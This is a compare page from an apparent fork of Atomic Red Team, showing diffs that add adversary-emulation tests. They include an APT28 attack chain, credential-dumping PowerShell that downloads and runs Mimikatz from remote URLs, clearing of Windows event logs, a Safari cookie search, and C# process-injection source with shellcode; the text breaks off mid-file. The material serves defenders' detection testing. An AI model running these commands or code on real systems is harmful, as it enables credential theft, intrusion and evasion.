adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: adam/atomic-red-team-gs:io-update
Branches Tags
adam/atomic-red-team-gs:master adam/atomic-red-team-gs:dependabot/pip/typer-0.25.1 adam/atomic-red-team-gs:dependabot/pip/hypothesis-6.152.4 adam/atomic-red-team-gs:remove_ruby adam/atomic-red-team-gs:attack-v19-migration adam/atomic-red-team-gs:dependabot/pip/pydantic-2.13.3 adam/atomic-red-team-gs:main adam/atomic-red-team-gs:fix_attack_nav adam/atomic-red-team-gs:markdown_changes adam/atomic-red-team-gs:external_payloads adam/atomic-red-team-gs:use-basic-parsing adam/atomic-red-team-gs:pre-commit adam/atomic-red-team-gs:python_conversion adam/atomic-red-team-gs:issue_template_fix adam/atomic-red-team-gs:insecure-curl adam/atomic-red-team-gs:T1553.001_fix adam/atomic-red-team-gs:npm_simulate adam/atomic-red-team-gs:remove_bin adam/atomic-red-team-gs:T1016_fix adam/atomic-red-team-gs:cloudlfare-tunnel adam/atomic-red-team-gs:remove_users_launch_daemon adam/atomic-red-team-gs:sysmon_fix adam/atomic-red-team-gs:fix_T1562.001 adam/atomic-red-team-gs:cyberbuff-patch-2 adam/atomic-red-team-gs:yamlfix adam/atomic-red-team-gs:remove-unused-static-dir adam/atomic-red-team-gs:clr2of8-patch-44 adam/atomic-red-team-gs:clr2of8-patch-43 adam/atomic-red-team-gs:clr2of8-patch-35 adam/atomic-red-team-gs:clr2of8-patch-32 adam/atomic-red-team-gs:t1547008 adam/atomic-red-team-gs:atoms adam/atomic-red-team-gs:clr2of8-patch-16 adam/atomic-red-team-gs:clr2of8-patch-14 adam/atomic-red-team-gs:testest adam/atomic-red-team-gs:linpeas_linux adam/atomic-red-team-gs:AutoSUID_linux adam/atomic-red-team-gs:clr2of8-patch-8 adam/atomic-red-team-gs:T1218.005-powershell-without-network-call adam/atomic-red-team-gs:revert-1530-adding_comments_to_navigator adam/atomic-red-team-gs:add_codeowners adam/atomic-red-team-gs:clr2of8-patch-3 adam/atomic-red-team-gs:oscd adam/atomic-red-team-gs:admin-guide adam/atomic-red-team-gs:APT28 adam/atomic-red-team-gs:update-PSDocs adam/atomic-red-team-gs:io-update adam/atomic-red-team-gs:ProcessHolllowingT1093
...
pull from: adam/atomic-red-team-gs:APT28
Branches Tags
adam/atomic-red-team-gs:dependabot/pip/typer-0.25.1 adam/atomic-red-team-gs:master adam/atomic-red-team-gs:dependabot/pip/hypothesis-6.152.4 adam/atomic-red-team-gs:remove_ruby adam/atomic-red-team-gs:attack-v19-migration adam/atomic-red-team-gs:dependabot/pip/pydantic-2.13.3 adam/atomic-red-team-gs:main adam/atomic-red-team-gs:fix_attack_nav adam/atomic-red-team-gs:markdown_changes adam/atomic-red-team-gs:external_payloads adam/atomic-red-team-gs:use-basic-parsing adam/atomic-red-team-gs:pre-commit adam/atomic-red-team-gs:python_conversion adam/atomic-red-team-gs:issue_template_fix adam/atomic-red-team-gs:insecure-curl adam/atomic-red-team-gs:T1553.001_fix adam/atomic-red-team-gs:npm_simulate adam/atomic-red-team-gs:remove_bin adam/atomic-red-team-gs:T1016_fix adam/atomic-red-team-gs:cloudlfare-tunnel adam/atomic-red-team-gs:remove_users_launch_daemon adam/atomic-red-team-gs:sysmon_fix adam/atomic-red-team-gs:fix_T1562.001 adam/atomic-red-team-gs:cyberbuff-patch-2 adam/atomic-red-team-gs:yamlfix adam/atomic-red-team-gs:remove-unused-static-dir adam/atomic-red-team-gs:clr2of8-patch-44 adam/atomic-red-team-gs:clr2of8-patch-43 adam/atomic-red-team-gs:clr2of8-patch-35 adam/atomic-red-team-gs:clr2of8-patch-32 adam/atomic-red-team-gs:t1547008 adam/atomic-red-team-gs:atoms adam/atomic-red-team-gs:clr2of8-patch-16 adam/atomic-red-team-gs:clr2of8-patch-14 adam/atomic-red-team-gs:testest adam/atomic-red-team-gs:linpeas_linux adam/atomic-red-team-gs:AutoSUID_linux adam/atomic-red-team-gs:clr2of8-patch-8 adam/atomic-red-team-gs:T1218.005-powershell-without-network-call adam/atomic-red-team-gs:revert-1530-adding_comments_to_navigator adam/atomic-red-team-gs:add_codeowners adam/atomic-red-team-gs:clr2of8-patch-3 adam/atomic-red-team-gs:oscd adam/atomic-red-team-gs:admin-guide adam/atomic-red-team-gs:APT28 adam/atomic-red-team-gs:update-PSDocs adam/atomic-red-team-gs:io-update adam/atomic-red-team-gs:ProcessHolllowingT1093

23 Commits
io-update ... APT28

Author SHA1 Message Date
Michael Haag 3c19a444d0 Create APT28 
first pass
 2019-05-01 18:31:49 -06:00
CircleCI Atomic Red Team doc generator c658cc41cf Generate docs from job=validate_atomics_generate_docs branch=master 2019-04-30 18:22:16 +00:00
Tony M Lambert 2ddd610a61 Add T1082 vm check from Pupy (#481) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* Add Linux guest vm checks

* case insensitivity
 2019-04-30 12:22:04 -06:00
CircleCI Atomic Red Team doc generator 2797ddabdc Generate docs from job=validate_atomics_generate_docs branch=master 2019-04-03 14:16:36 +00:00
Glenn Barrett ba8560206f Correct URL for DownloadString (#480) 
The Get-Inbox.ps1 is not in the ARTifacts directory, it is in the directory for this technique
 2019-04-03 08:15:59 -06:00
Michael Haag 16f6b633ce T1086 msxml (#471) 
* Update T1086.yaml

Modified test to have both. I think it's worth having two executions in this sense as it assists with validating remote (SOC/SIEM) detection + console (stdout) detection. I'm for modifying them all, but not sure the urgency.

Issue #466

* Generate docs from job=validate_atomics_generate_docs branch=T1086MSXML

* Fixed quotes

Fixed quotes per 2nd comment on #466

* Generate docs from job=validate_atomics_generate_docs branch=T1086MSXML
 2019-03-26 13:13:12 -07:00
Michael Haag 5f49684c43 Install fixes (#462) 
* Install fixes

Updated casing. Should be happier

* fix docs-invoke page

Fixing docs invoke page to match the other readme
 2019-03-26 13:13:05 -07:00
Michael Haag d91f2c1479 T1220 (#472) 
* T1220 Fix

T1220 fix per #467

* Generate docs from job=validate_atomics_generate_docs branch=T1220
 2019-03-26 13:12:58 -07:00
Michael Haag 820ed2e465 T1197 (#473) 
* Update T1197.yaml

Fixed issue #463
Fixed issue #464

* Generate docs from job=validate_atomics_generate_docs branch=t1197
 2019-03-26 13:12:49 -07:00
Michael Haag 0c3e47f7be T1100 and T1071 (#475) 
* Technique - T1071

First commit of T1071 - Standard Application Layer Protocols.
Specifically using powershell & Curl to simulate malicious user agents.

* Web Shell

Simple test of copying webshells from atomic dir to a path on the file system.

* typo

* Generate docs from job=validate_atomics_generate_docs branch=web
 2019-03-26 13:12:40 -07:00
Zac Brown 80e983e3d9 Update PyYAML to >= 4.2b1 due to security alert: https://nvd.nist.gov/vuln/detail/CVE-2017-18342 (#474) 2019-03-26 11:52:59 -06:00
Michael Haag f69ea2a586 T1022 Updates (#470) 
* T1022 Updates

Bypass PR #351 (some weird issue in there).
Update schema and tab completion.
Credit to @samuelmarticotteBELL

Thanks for the help!

* Update T1022.yaml

Fixed error

* Update T1022.yaml

space fix

* Generate docs from job=validate_atomics_generate_docs branch=T1022
 2019-03-26 10:52:37 -07:00
Michael Haag d258111402 BloodHound URLs - T1086 (#468) 
* URLs

Fix url's for issue #465

* Generate docs from job=validate_atomics_generate_docs branch=t1086
 2019-03-15 10:02:19 -04:00
caseysmithrc a668ff07d9 T1055 process injection (#460) 
* ProcessInjection-FiveAlive

* Generate docs from job=validate_atomics_generate_docs branch=T1055-ProcessInjection
 2019-02-17 14:45:00 -08:00
Michael Haag 818c2ce55d DragonsTail (#458) 
Updated URLs to fix #437
 2019-02-14 13:43:31 -08:00
Michael Haag 7e34cbe7df ART - Getting Started Made Easy (#459) 
* New Guide + Execution Script

Commit of new script and guide!

* Updated ReadMe

Updated Readme with new instructions

* Fixed typos

Typo gone and ready!
 2019-02-14 13:13:13 -08:00
Greg Foss 60bc6fd9e1 Add test for T1114 that extracts email from the local outlook instance (#456) 2019-02-13 22:10:54 -08:00
CircleCI Atomic Red Team doc generator a1c83527fb Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-14 06:10:46 +00:00
Keep Watcher 02dc3e41ab Certutil update (#452) 
* Fixing certutil syntax error

* Adding certutil download tests

* Adding commands to rename download for verifyctl argument

* Fixing type syntax
 2019-02-13 22:10:39 -08:00
CircleCI Atomic Red Team doc generator e0d70c657d Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-14 06:09:52 +00:00
Tony M Lambert d490f345a7 T1005 Safari CookieMiner Test (#454) 
* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* Added Safari cookie search CookieMiner test
 2019-02-13 22:09:44 -08:00
CircleCI Atomic Red Team doc generator f2d16ae0c7 Generate docs from job=validate_atomics_generate_docs branch=master 2019-02-14 06:09:31 +00:00
Greg Foss 9b52b9ff4b T1074 update for OSX and Linux (#457) 
* Add test for T1114 that extracts email from the local outlook instance

* Update T1074 with Linux and OSX staged data tests
 2019-02-13 22:09:23 -08:00
53 changed files with 5098 additions and 238 deletions
Expand all files Collapse all files
ARTifacts/Chain_Reactions/APT28
+87
View File
@@ -0,0 +1,87 @@
:: T1119
:: Automated Collection
:: T1067
:: Bootkit
:: T1122
:: Component Object Model Hijacking
:: T1059
:: Command-Line Interface
:: T1086
:: PowerShell
:: T1003
:: Credential Dumping
:: Live Fire
:: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Simulation
powershell.exe "(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX ((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))); invoke-mimikatz -dumpcr"
:: T1074
:: Data Staged
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
:: T1158
:: Hidden Files and Directories
attrib.exe +h C:\Windows\pi.log
:: T1083
:: File and Directory Discovery
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
tree /F >> %temp%\download
:: T1002
:: Data Compressed
dir c:\windows\*.log -Recurse | Compress-Archive -DestinationPath c:\temp\data.zip
:: T1005
:: Data from Local System
forfiles
:: T1001
:: Data Obfuscation
:: APT28 added "junk data" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a "junk length" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.[4]
:: T1140
:: Deobfuscate/Decode Files or Information
:: An APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload
certutil -decode
:: T1107
:: File Deletion
:: T1070
:: Indicator Removal on Host
cmd /c wevtutil.exe cl System
cmd /c wevtutil.exe cl Security
:: T1056
:: Input Capture
:: T1040
:: Network Sniffing
:: APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials.[4][23]
::T1057
:: Process Discovery
:: An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.[26]
tasklist.exe | findstr explorer.exe
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+2 -2
View File
@@ -9,7 +9,7 @@
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+2 -2
View File
@@ -9,7 +9,7 @@
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
atomics/T1005/T1005.md
+30
View File
@@ -0,0 +1,30 @@
# T1005 - Data from Local System
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1005)
<blockquote>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Search macOS Safari Cookies](#atomic-test-1---search-macos-safari-cookies)
<br/>
## Atomic Test #1 - Search macOS Safari Cookies
This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
**Supported Platforms:** macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase|
#### Run it with `sh`!
```
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
<br/>
atomics/T1005/T1005.yaml
+23
View File
@@ -0,0 +1,23 @@
---
attack_technique: T1005
display_name: Data from Local System
atomic_tests:
- name: Search macOS Safari Cookies
description: |
This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
supported_platforms:
- macos
input_arguments:
search_string:
description: String to search Safari cookies to find.
type: string
default: coinbase
executor:
name: sh
command: |
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
atomics/T1022/T1022.md
+62 -2
View File
@@ -6,12 +6,18 @@ Other exfiltration techniques likely apply as well to transfer the information o
## Atomic Tests
- [Atomic Test #1 - Data Encrypted](#atomic-test-1---data-encrypted)
- [Atomic Test #1 - Data Encrypted with zip and gpg](#atomic-test-1---data-encrypted-with-zip-and-gpg)
- [Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar](#atomic-test-2---compress-data-and-lock-with-password-for-exfiltration-with-winrar)
- [Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip](#atomic-test-3---compress-data-and-lock-with-password-for-exfiltration-with-winzip)
- [Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip](#atomic-test-4---compress-data-and-lock-with-password-for-exfiltration-with-7zip)
<br/>
## Atomic Test #1 - Data Encrypted
## Atomic Test #1 - Data Encrypted with zip and gpg
Encrypt data for exiltration
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
@@ -29,3 +35,57 @@ gpg -c /tmp/victim-gpg.txt
ls -l
```
<br/>
<br/>
## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar
Note: Requires winrar installation
rar a -p"blue" hello.rar (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
rar a -hp"blue" hello.rar
dir
```
<br/>
<br/>
## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip
Note: Requires winzip installation
wzzip sample.zip -s"blueblue" *.txt (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
path=%path%;"C:\Program Files (x86)\winzip"
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
dir
```
<br/>
<br/>
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip
Note: Requires 7zip installation
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
7z a archive.7z -pblue
dir
```
<br/>
atomics/T1022/T1022.yaml
+46 -2
View File
@@ -3,10 +3,9 @@ attack_technique: T1022
display_name: Data Encrypted
atomic_tests:
- name: Data Encrypted
- name: Data Encrypted with zip and gpg
description: |
Encrypt data for exiltration
supported_platforms:
- macos
- centos
@@ -24,3 +23,48 @@ atomic_tests:
gpg -c /tmp/victim-gpg.txt
<enter passphrase and confirm>
ls -l
- name: Compress Data and lock with password for Exfiltration with winrar
description: |
Note: Requires winrar installation
rar a -p"blue" hello.rar (VARIANT)
supported_platforms:
- windows
executor:
name: command_prompt
command: |
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
rar a -hp"blue" hello.rar
dir
- name: Compress Data and lock with password for Exfiltration with winzip
description: |
Note: Requires winzip installation
wzzip sample.zip -s"blueblue" *.txt (VARIANT)
supported_platforms:
- windows
executor:
name: command_prompt
command: |
path=%path%;"C:\Program Files (x86)\winzip"
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
dir
- name: Compress Data and lock with password for Exfiltration with 7zip
description: |
Note: Requires 7zip installation
supported_platforms:
- windows
executor:
name: command_prompt
command: |
mkdir ./tmp/victim-files
cd ./tmp/victim-files
echo "This file will be encrypted" > ./encrypted_file.txt
7z a archive.7z -pblue
dir
atomics/T1055/T1055.md
+27
View File
@@ -31,6 +31,8 @@ Malware commonly utilizes process injection to access system resources through w
- [Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-3---shared-library-injection-via-etcldsopreload)
- [Atomic Test #4 - Process Injection via C#](#atomic-test-4---process-injection-via-c)
<br/>
@@ -88,3 +90,28 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter
echo #{path_to_shared_library} > /etc/ld.so.preload
```
<br/>
<br/>
## Atomic Test #4 - Process Injection via C#
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | T1055.exe|
#### Run it with `command_prompt`!
```
.\bin\#{exe_binary}
```
<br/>
atomics/T1055/T1055.yaml
+23
View File
@@ -59,3 +59,26 @@ atomic_tests:
name: bash
command: |
echo #{path_to_shared_library} > /etc/ld.so.preload
- name: Process Injection via C#
description: |
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
supported_platforms:
- windows
input_arguments:
exe_binary:
description: Output Binary
type: Path
default: T1055.exe
executor:
name: command_prompt
command: |
.\bin\#{exe_binary}
atomics/T1055/bin/T1055.exe
Executable
BIN
View File
Binary file not shown.
atomics/T1055/src/T1055.cs
+1147
View File
@@ -0,0 +1,1147 @@
//Atomic Process Injection Tests
//xref: https://github.com/pwndizzle/c-sharp-memory-injection
// https://github.com/peterferrie/win-exec-calc-shellcode
// To run:
// 1. Compile code - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:..\bin\T1055.exe T1055.cs
//
using System;
using System.Reflection;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
using System.Collections.Generic;
using System.ComponentModel;
using System.Text;
public class ProcessInject
{
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess,
IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
// privileges
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
// used for memory allocation
const uint MEM_COMMIT = 0x00001000;
const uint MEM_RESERVE = 0x00002000;
const uint PAGE_READWRITE = 4;
public static int Inject()
{
// Get process id
Console.WriteLine("Get process by name...");
System.Diagnostics.Process.Start("notepad");
Process targetProcess = Process.GetProcessesByName("notepad")[0];
// Get handle of the process - with required privileges
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// Get address of LoadLibraryA and store in a pointer
IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
// Path to dll that will be injected
string dllName = @"C:\AtomicRedTeam\atomics\T1055\bin\w64-exec-calc-shellcode.dll";
// Allocate memory for dll path and store pointer
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Write path of dll to memory
UIntPtr bytesWritten;
bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, System.Text.Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
// Read contents of memory
int bytesRead = 0;
byte[] buffer = new byte[24];
ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead);
Console.WriteLine("Data in memory: " + System.Text.Encoding.UTF8.GetString(buffer));
// Create a thread that will call LoadLibraryA with allocMemAddress as argument
CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);
return 0;
}
}
public class ApcInjectionAnyProcess
{
public static void Inject()
{
byte[] shellcode = new byte[112] {
0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
};
// Open process. "explorer" is a good target due to the large number of threads which will enter alertable state
Process targetProcess = Process.GetProcessesByName("notepad")[0];
IntPtr procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// Allocate memory within process and write shellcode
IntPtr resultPtr = VirtualAllocEx(procHandle, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = WriteProcessMemory(procHandle,resultPtr,shellcode,shellcode.Length, out bytesWritten);
// Modify memory permissions on shellcode from XRW to XR
uint oldProtect = 0;
resultBool = VirtualProtectEx(procHandle, resultPtr, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);
// Iterate over threads and queueapc
foreach (ProcessThread thread in targetProcess.Threads)
{
//Get handle to thread
IntPtr tHandle = OpenThread(ThreadAccess.THREAD_HIJACK, false, (int)thread.Id);
//Assign APC to thread to execute shellcode
IntPtr ptr = QueueUserAPC(resultPtr, tHandle, IntPtr.Zero);
}
}
// Memory permissions
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
//private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE_READ = 0x20;
// Process privileges
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
[Flags]
public enum ThreadAccess : int
{
TERMINATE = (0x0001),
SUSPEND_RESUME = (0x0002),
GET_CONTEXT = (0x0008),
SET_CONTEXT = (0x0010),
SET_INFORMATION = (0x0020),
QUERY_INFORMATION = (0x0040),
SET_THREAD_TOKEN = (0x0080),
IMPERSONATE = (0x0100),
DIRECT_IMPERSONATION = (0x0200),
THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT,
THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
int dwThreadId);
[DllImport("kernel32.dll",SetLastError = true)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
Int32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true )]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
int dwSize, uint flNewProtect, out uint lpflOldProtect);
}
public class ApcInjectionNewProcess
{
public static void Inject()
{
byte[] shellcode = new byte[112] {
